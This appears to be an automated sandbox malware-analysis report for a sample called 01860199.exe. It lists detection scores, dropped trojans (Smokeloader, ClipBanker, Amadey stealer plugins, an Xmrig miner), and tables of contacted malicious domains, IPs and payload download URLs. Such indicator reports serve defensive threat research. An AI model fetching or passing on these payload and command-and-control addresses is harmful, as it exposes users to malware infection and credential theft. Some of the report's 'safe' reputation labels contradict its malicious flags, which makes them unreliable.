Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Services File Permissions Weakness	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
01860199.exe	38%	ReversingLabs
01860199.exe	38%	Virustotal	Browse
01860199.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	100%	Avira	HEUR/AGEN.1301090
C:\Users\user\AppData\Local\Temp\9F31.exe	100%	Avira	HEUR/AGEN.1357339
C:\Users\user\AppData\Local\Temp\5DA0.exe	100%	Avira	HEUR/AGEN.1357339
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe	100%	Avira	TR/Crypt.XPACK.Gen8
C:\Users\user\AppData\Local\Temp\6FA9.exe	100%	Avira	HEUR/AGEN.1357339
C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe	100%	Avira	TR/Crypt.XPACK.Gen8
C:\Users\user\AppData\Local\Temp\3C54.exe	100%	Avira	HEUR/AGEN.1357339
C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	100%	Avira	HEUR/AGEN.1319380
C:\Users\user\AppData\Local\Temp\D804.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\57DC.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\9F31.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\B46F.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\5DA0.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\A3D5.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\BC2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\D689.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\EA44.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\388B.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\CBE6.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\C861.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\673.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\A170.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\3E02.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\6FA9.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\B8C8.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\F4F7.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\3C54.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\913F.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	87%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe	88%	ReversingLabs	Win32.Trojan.ClipBanker
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exe	87%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe	88%	ReversingLabs	Win32.Trojan.ClipBanker
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	83%	ReversingLabs	Win64.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\3C54.exe	70%	ReversingLabs	ByteCode-MSIL.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\57DC.exe	43%	ReversingLabs
C:\Users\user\AppData\Local\Temp\5DA0.exe	70%	ReversingLabs	ByteCode-MSIL.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\6FA9.exe	70%	ReversingLabs	ByteCode-MSIL.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	88%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\AppData\Local\Temp\913F.exe	71%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\9F31.exe	70%	ReversingLabs	ByteCode-MSIL.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\A170.exe	71%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\A3D5.exe	71%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\B8C8.exe	71%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\D689.exe	71%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\NewPlayer.exe	88%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\AppData\Local\Temp\XandETC.exe	73%	ReversingLabs	Win64.Coinminer.Xmrig
C:\Users\user\AppData\Local\Temp\aafg31.exe	33%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll	83%	ReversingLabs	Win64.Trojan.Amadey
C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	88%	ReversingLabs	Win32.Trojan.ClipBanker
C:\Users\user\AppData\Roaming\hwgujdv	38%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
toobussy.com	3%	Virustotal	Browse
colisumy.com	24%	Virustotal	Browse
potunulit.org	22%	Virustotal	Browse
jp.imgjeoighw.com	19%	Virustotal	Browse
speedlab.com.eg	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://potunulit.org/	0%	URL Reputation	safe
http://jp.imgjeoighw.com/sts/image.jpg	0%	URL Reputation	safe
http://ss.apjeoighw.com/	0%	URL Reputation	safe
http://zexeq.com/raud/get.php	100%	URL Reputation	malware
http://kingpirate.ru/tmp/	0%	URL Reputation	safe
http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov	0%	URL Reputation	safe
http://45.9.74.80/power.exe	100%	URL Reputation	malware
http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro	0%	URL Reputation	safe
http://zexeq.com/files/1/build3.exe$run	100%	URL Reputation	malware
http://ss.apjeoighw.com/check/safe	0%	URL Reputation	safe
http://colisumy.com/dl/build2.exe	100%	URL Reputation	malware
https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://zexeq.com/files/1/build3.exe	0%	URL Reputation	safe
http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=trueQ58	100%	Avira URL Cloud	malware
https://we.tl/t-tnzomMj6	0%	Avira URL Cloud	safe
http://ss.apjeoighw.com/check/safe3	0%	Avira URL Cloud	safe
http://zexeq.com/files/1/build3.exel	100%	Avira URL Cloud	malware
http://colisumy.com/dl/build2.exe$run	100%	Avira URL Cloud	malware
45.9.74.80/0bjdn2Z/index.php	100%	Avira URL Cloud	malware
http://colisumy.com/dl/build2.exerun3	100%	Avira URL Cloud	malware
https://shsplatform.co.uk/tmp/index.php	100%	Avira URL Cloud	malware
http://45.9.74.80/0bjdn2Z/Plugins/clip64.dll	100%	Avira URL Cloud	malware
http://188.34.154.187:30303/addon.zip	0%	Avira URL Cloud	safe
http://45.9.74.80/0bjdn2Z/Plugins/cred64.dll	100%	Avira URL Cloud	malware
http://ss.apjeoighw.com/check/safe)	0%	Avira URL Cloud	safe
http://194.180.48.90/cc.exe	0%	Avira URL Cloud	safe
http://ss.apjeoighw.com:80/check/safe	0%	Avira URL Cloud	safe
https://speedlab.com.eg/tmp/index.php	0%	Avira URL Cloud	safe
http://ss.apjeoighw.com/check/safe1B	0%	Avira URL Cloud	safe
http://zexeq.com/files/1/build3.exe$runZT	100%	Avira URL Cloud	malware
http://toobussy.com/	0%	Avira URL Cloud	safe
http://jp.imgjeoighw.com/sts/image.jpgO	100%	Avira URL Cloud	malware
http://ss.apjeoighw.com/check/?sid=436160&key=a96ab7e5e6412d32675599dfaebc13f6	0%	Avira URL Cloud	safe
http://zexeq.com/raud/get.phpep	100%	Avira URL Cloud	malware
http://wuc11.com/tmp/	0%	Avira URL Cloud	safe
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	0%	Avira URL Cloud	safe
http://ss.apjeoighw.com/blob:	0%	Avira URL Cloud	safe
http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C	100%	Avira URL Cloud	malware
http://188.34.154.187:30303/	0%	Avira URL Cloud	safe
http://ss.apjeoighw.com/check/?sid=436336&key=3f9d01718af2d5daf3c654f2052d5bc7	0%	Avira URL Cloud	safe
http://45.9.74.80/0bjdn2Z/index.php	100%	Avira URL Cloud	malware
http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F011280Nkx%	100%	Avira URL Cloud	malware
http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=true	100%	Avira URL Cloud	malware
http://colisumy.com/dl/build.exe	100%	Avira URL Cloud	malware
http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0	100%	Avira URL Cloud	malware
http://188.34.154.187:30303/e44c96dfdf315ccf17cdd4b93cfe6e48	0%	Avira URL Cloud	safe
http://ss.apjeoighw.com/check/?sid=436234&key=2cef0d99b721939135d08fea0dcaba52	0%	Avira URL Cloud	safe
http://toobussy.com/tmp/	100%	Avira URL Cloud	malware
http://ss.apjeoighw.com:80/check/?sid=436234&key=2cef0d99b721939135d08fea0dcaba52G_	0%	Avira URL Cloud	safe
http://45.9.74.80/0bjdn2Z/index.php?scr=1	100%	Avira URL Cloud	malware
http://ladogatur.ru/tmp/	0%	Avira URL Cloud	safe
https://we.tl/t-tnzomMj6HU	0%	Avira URL Cloud	safe
http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806Cg	100%	Avira URL Cloud	malware
http://zexeq.com/files/1/build3.exerunb10	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
toobussy.com	222.236.49.123	true	true	3%, Virustotal, Browse	unknown
star-mini.c10r.facebook.com	157.240.9.35	true	false		high
star.c10r.facebook.com	157.240.17.17	true	false		high
colisumy.com	211.119.84.112	true	true	24%, Virustotal, Browse	unknown
potunulit.org	188.114.97.7	true	true	22%, Virustotal, Browse	unknown
jp.imgjeoighw.com	103.100.211.218	true	true	19%, Virustotal, Browse	unknown
speedlab.com.eg	217.174.148.28	true	true	1%, Virustotal, Browse	unknown
t.me	149.154.167.99	true	false		high
ss.apjeoighw.com	154.221.31.191	true	false		unknown
api.2ip.ua	162.0.217.254	true	false		high
shsplatform.co.uk	80.66.203.53	true	true		unknown
zexeq.com	175.119.10.231	true	true		unknown
www.facebook.com	unknown	unknown	false		high
adsmanager.facebook.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://potunulit.org/	true	URL Reputation: safe	unknown
https://shsplatform.co.uk/tmp/index.php	true	Avira URL Cloud: malware	unknown
http://jp.imgjeoighw.com/sts/image.jpg	true	URL Reputation: safe	unknown
http://45.9.74.80/0bjdn2Z/Plugins/cred64.dll	true	Avira URL Cloud: malware	unknown
http://zexeq.com/raud/get.php	true	URL Reputation: malware	unknown
45.9.74.80/0bjdn2Z/index.php	true	Avira URL Cloud: malware	low
https://steamcommunity.com/profiles/76561199508624021	false		high
http://188.34.154.187:30303/addon.zip	false	Avira URL Cloud: safe	unknown
http://45.9.74.80/0bjdn2Z/Plugins/clip64.dll	true	Avira URL Cloud: malware	unknown
http://kingpirate.ru/tmp/	true	URL Reputation: safe	unknown
http://194.180.48.90/cc.exe	true	Avira URL Cloud: safe	unknown
https://speedlab.com.eg/tmp/index.php	true	Avira URL Cloud: safe	unknown
https://adsmanager.facebook.com/ads/manager/account_settings/account_billing/	false		high
http://45.9.74.80/power.exe	true	URL Reputation: malware	unknown
https://t.me/looking_glassbot	false		high
http://ss.apjeoighw.com/check/?sid=436160&key=a96ab7e5e6412d32675599dfaebc13f6	false	Avira URL Cloud: safe	unknown
http://wuc11.com/tmp/	true	Avira URL Cloud: safe	unknown
http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C	true	Avira URL Cloud: malware	unknown
http://188.34.154.187:30303/	false	Avira URL Cloud: safe	unknown
http://45.9.74.80/0bjdn2Z/index.php	true	Avira URL Cloud: malware	unknown
http://ss.apjeoighw.com/check/?sid=436336&key=3f9d01718af2d5daf3c654f2052d5bc7	false	Avira URL Cloud: safe	unknown
http://colisumy.com/dl/build.exe	true	Avira URL Cloud: malware	unknown
http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=true	true	Avira URL Cloud: malware	unknown
http://ss.apjeoighw.com/check/safe	false	URL Reputation: safe	unknown
http://colisumy.com/dl/build2.exe	true	URL Reputation: malware	unknown
https://api.2ip.ua/geo.json	false		high
http://188.34.154.187:30303/e44c96dfdf315ccf17cdd4b93cfe6e48	false	Avira URL Cloud: safe	unknown
http://ss.apjeoighw.com/check/?sid=436234&key=2cef0d99b721939135d08fea0dcaba52	false	Avira URL Cloud: safe	unknown
http://45.9.74.80/0bjdn2Z/index.php?scr=1	true	Avira URL Cloud: malware	unknown
http://toobussy.com/tmp/	true	Avira URL Cloud: malware	unknown
http://ladogatur.ru/tmp/	true	Avira URL Cloud: safe	unknown
https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F	false		high
http://zexeq.com/files/1/build3.exe	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://static.xx.fbcdn.net/rsrc.php/v3/y-/l/0	aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644310592.000001E292380000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/v75M7CPu9-P.js?_nc_x=Ij3Wp8lg5Kz	aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199508624021update.zipopenopen_NULL%s	build2.exe, 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmp	false		high
https://messenger.com/	aafg31.exe, 00000015.00000003.616407141.000001E2922BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616875927.000001E2922D3000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmp	false		high
http://zexeq.com/files/1/build3.exel	D804.exe, 00000013.00000002.636070288.000000000320F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/camCPYrr6r7.js?_nc_x=Ij3Wp8lg5Kz	aafg31.exe, 00000015.00000003.616407141.000001E2922BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617256768.000001E292290000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.536338668.000001E292285000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616875927.000001E2922D3000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922D6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.536309898.000001E292289000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558924559.000001E292285000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617144495.000001E292287000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644310592.000001E292380000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://colisumy.com/dl/build2.exe$run	D804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ss.apjeoighw.com/	aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://colisumy.com/dl/build2.exerun3	D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://t.me/looking_glassbotlookataddon.zipMozilla/5.0	build2.exe, 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmp	false		high
https://we.tl/t-tnzomMj6	D804.exe, 00000013.00000002.619178225.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.reddit.com/	D804.exe, 00000013.00000003.475323189.00000000032B0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonyY&$	D804.exe, 00000010.00000002.619429561.0000000000808000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/u	D804.exe, 00000013.00000003.452681314.0000000000647000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ss.apjeoighw.com/check/safe3	aafg31.exe, 00000015.00000002.642437211.000001E292275000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=trueQ58	D804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0	aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonV	D804.exe, 00000013.00000002.619178225.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0	aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmp	false		high
http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov	explorer.exe, 00000001.00000000.378821866.00007FFC1B439000.00000002.00000001.01000000.00000005.sdmp	false	URL Reputation: safe	unknown
http://ss.apjeoighw.com/check/safe)	aafg31.exe, 00000015.00000002.642437211.000001E292275000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ss.apjeoighw.com:80/check/safe	aafg31.exe, 00000015.00000003.539647639.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz	aafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ss.apjeoighw.com/check/safe1B	aafg31.exe, 00000015.00000002.618169870.000001E2900FB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsonG.S	D804.exe, 00000006.00000002.450438133.0000000000707000.00000004.00000020.00020000.00000000.sdmp	false		high
http://zexeq.com/files/1/build3.exe$runZT	D804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://zexeq.com/raud/get.phpep	D804.exe, 00000010.00000002.619429561.0000000000808000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://api.2ip.ua/?	D804.exe, 00000013.00000003.452681314.0000000000647000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.youtube.com/	D804.exe, 00000013.00000003.475594980.00000000032B0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json1	A170.exe, 0000001D.00000002.490407985.00000000008D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yB/l/0	aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmp	false		high
http://jp.imgjeoighw.com/sts/image.jpgO	aafg31.exe, 00000015.00000002.618169870.000001E2900FB000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://static.xx.fbcdn.net/rsrc.php/v3/yI/r/Ib90vcVxYzI.js?_nc_x=Ij3Wp8lg5Kz	aafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617144495.000001E292287000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.643446636.000001E29228C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://toobussy.com/	aafg31.exe, 00000015.00000003.616407141.000001E2922EB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsonA	A170.exe, 0000001D.00000002.490407985.00000000008D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yK/l/0	aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644310592.000001E292380000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmp	false		high
